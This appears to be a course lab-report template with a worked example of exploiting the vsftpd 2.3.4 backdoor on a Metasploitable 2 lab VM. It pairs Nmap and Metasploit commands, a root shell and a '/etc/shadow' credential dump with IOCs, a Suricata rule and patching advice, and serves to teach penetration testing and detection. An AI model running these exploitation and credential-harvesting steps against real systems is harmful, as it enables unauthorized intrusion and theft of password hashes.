8.8 KiB
LAB REPORT TEMPLATE
Apophis Networking Security Lab
Student Name: ___________________________ Module Number: ___________________________ Lab Title: ___________________________ Date Submitted: ___________________________
1. EXECUTIVE SUMMARY (1 paragraph)
Provide a high-level overview of the lab objectives, key findings, and outcomes. This should be understandable by non-technical stakeholders.
Example:
This lab focused on exploiting the vsftpd 2.3.4 backdoor vulnerability (CVE-2011-2523) on a Metasploitable 2 target system. The exploitation was successful, resulting in root-level access to the target. Post-exploitation activities included credential harvesting and persistence establishment. This exercise demonstrated the critical importance of patch management and network segmentation in preventing unauthorized access.
2. OBJECTIVES
List the specific learning objectives for this lab.
Example:
- Configure and execute Metasploit Framework exploits
- Understand the mechanics of reverse shell payloads
- Perform post-exploitation enumeration
- Document exploitation chains for penetration testing reports
3. TOOLS & ENVIRONMENT
3.1 Attack Platform
- OS: Kali Linux 2024.1
- IP Address: 10.10.2.50
- Tools Used:
- Metasploit Framework v6.3.x
- Nmap 7.94
- Wireshark 4.0.x
3.2 Target System
- OS: Metasploitable 2 (Ubuntu 8.04)
- IP Address: 10.10.4.10
- Vulnerable Services:
- vsftpd 2.3.4 (Port 21)
- OpenSSH 4.7p1 (Port 22)
- Apache 2.2.8 (Port 80)
3.3 Network Topology
[Kali Linux] [pfSense Firewall] [Metasploitable 2]
10.10.2.50 <---> 10.10.2.1 | 10.10.4.1 <---> 10.10.4.10
VLAN 200 VLAN 400
(Red Team) (Victim Network)
4. METHODOLOGY
Describe the step-by-step process followed during the lab. Use numbered steps and include relevant commands.
4.1 Pre-Exploitation: Reconnaissance
Step 1: Host Discovery
nmap -sn 10.10.4.0/24
Output:
Nmap scan report for 10.10.4.10
Host is up (0.00042s latency).
Step 2: Port Scanning
sudo nmap -sS -sV -p- 10.10.4.10 -oA full_scan
Output:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1
...
Analysis: vsftpd 2.3.4 identified—known to contain backdoor vulnerability (CVE-2011-2523).
4.2 Exploitation
Step 3: Launch Metasploit
msfconsole -q
Step 4: Select Exploit Module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.4.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
Output:
[*] 10.10.4.10:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.4.10:6200 - Shell command shell session 1 opened
Result: Successful exploitation. Root shell obtained.
4.3 Post-Exploitation
Step 5: Verify Access
id
Output:
uid=0(root) gid=0(root)
Step 6: Credential Harvesting
cat /etc/shadow
Output: (Include first 3 lines only for report)
root:$1$XjpI2OBz$...:0:0:root:/root:/bin/bash
daemon:*:14684:0:99999:7:::
...
5. FINDINGS & ANALYSIS
5.1 Key Discoveries
Vulnerability Identified:
- CVE: CVE-2011-2523
- Severity: Critical (CVSS 10.0)
- Description: vsftpd 2.3.4 contains malicious backdoor code that opens shell access on port 6200 when username contains
:)smiley face. - Exploitability: Trivial—no authentication required.
Impact Assessment:
- Confidentiality: HIGH—Full read access to all files including /etc/shadow
- Integrity: HIGH—Root access allows file modification
- Availability: HIGH—Attacker could delete files or crash system
5.2 Network Traffic Analysis
Wireshark Observations:
- TCP stream 1: FTP connection (port 21) with malicious username
- TCP stream 2: Shell session on port 6200
- No encryption—all commands visible in plaintext
Screenshot: [Include Wireshark screenshot showing backdoor traffic]
6. INDICATORS OF COMPROMISE (IOCs)
| Type | Value | Description |
|---|---|---|
| IP Address | 10.10.2.50 | Attacker source IP |
| Port | 6200 | vsftpd backdoor listening port |
| Process | vsftpd | Spawned root shell (suspicious parent) |
| Network | TCP SYN to 6200 | Connection to non-standard FTP port |
7. DEFENSIVE RECOMMENDATIONS
7.1 Immediate Actions
- Patch vsftpd: Upgrade to version 3.0.5 or disable service if not needed
- Network Segmentation: Block victim network from initiating connections to Red Team VLAN
- IDS Rule: Deploy Suricata signature for port 6200 connections
7.2 Long-Term Improvements
- Vulnerability Management: Implement automated scanning (weekly)
- Patch Management: Establish SLA for critical patches (24-48 hours)
- Firewall Rules: Default-deny egress from victim network
- Security Monitoring: Alert on connections to non-standard ports
8. DETECTION ENGINEERING
8.1 Suricata Rule
alert tcp any any -> any 6200 (msg:"vsftpd 2.3.4 Backdoor Connection"; flow:established,to_server; sid:1000050; rev:1;)
8.2 Security Onion Query (KQL)
destination.port: 6200 AND event.module: "suricata"
8.3 MITRE ATT&CK Mapping
- Tactic: Initial Access (TA0001)
- Technique: T1190 - Exploit Public-Facing Application
- Sub-Technique: FTP Service Exploitation
9. CHALLENGES & TROUBLESHOOTING
Challenge 1: Initial exploit failed with "connection refused"
Root Cause: VLAN tag not set correctly on VM network interface in Proxmox.
Solution:
# Proxmox VM > Hardware > Network Device > Edit
# VLAN Tag: 400 (was blank)
Challenge 2: Wireshark showed no captured packets
Root Cause: Capturing on wrong interface (wlan0 instead of eth0).
Solution:
sudo tcpdump -i eth0 # Verify interface has traffic
sudo wireshark -i eth0
10. LESSONS LEARNED
What Went Well
- Successful identification and exploitation of vulnerability
- Comprehensive documentation with screenshots
- Effective use of network segmentation for safe testing
What Could Be Improved
- Faster troubleshooting (spent 30 minutes on VLAN issue)
- More thorough initial reconnaissance (missed some services)
- Should have taken VM snapshot before exploitation
Key Takeaways
- Offensive Perspective: Outdated software is trivially exploitable—attackers have automated scanners for this.
- Defensive Perspective: One unpatched service can compromise entire network. Defense-in-depth is critical.
- Forensics Importance: Without packet capture, proving the attack vector would be difficult in IR scenario.
11. APPENDICES
Appendix A: Command History
# Full command history from Kali terminal
history > command_history.txt
(Attach file: command_history.txt)
Appendix B: Screenshots
- Screenshot 1: Nmap scan results showing vsftpd 2.3.4
- Screenshot 2: Metasploit successful exploitation
- Screenshot 3: Root shell access (id command output)
- Screenshot 4: Wireshark PCAP showing port 6200 connection
- Screenshot 5: Security Onion alert for detection
Appendix C: Packet Capture
(Attach file: exploitation.pcapng)
Appendix D: Metasploit Output Log
(Attach file: msfconsole.log)
12. REFERENCES
- National Vulnerability Database. (2011). CVE-2011-2523. Retrieved from https://nvd.nist.gov/vuln/detail/CVE-2011-2523
- Rapid7. (2024). Metasploit Framework Documentation. Retrieved from https://docs.rapid7.com/metasploit/
- MITRE Corporation. (2024). ATT&CK Framework - T1190. Retrieved from https://attack.mitre.org/techniques/T1190/
- OWASP. (2021). Top 10 Web Application Security Risks. Retrieved from https://owasp.org/Top10/
13. DECLARATION
I certify that this lab report represents my own work and that all tools were used in an authorized, ethical manner within the confines of my personal lab environment. I understand that unauthorized computer access is illegal.
Signature: ___________________________ Date: ___________________________
END OF LAB REPORT
GRADING RUBRIC FOR THIS REPORT
| Section | Points | Criteria |
|---|---|---|
| Executive Summary | 5 | Clear, concise, non-technical language |
| Methodology | 20 | Step-by-step, reproducible, includes commands |
| Findings & Analysis | 20 | Technical depth, vulnerability details, impact |
| Screenshots | 15 | Relevant, annotated, high-quality |
| Detection Engineering | 15 | Custom rules, MITRE mapping, queries |
| Defensive Recommendations | 10 | Actionable, prioritized, realistic |
| Lessons Learned | 5 | Self-reflection, improvement mindset |
| Documentation Quality | 10 | Formatting, grammar, professionalism |
| TOTAL | 100 |
Minimum Passing Score: 70/100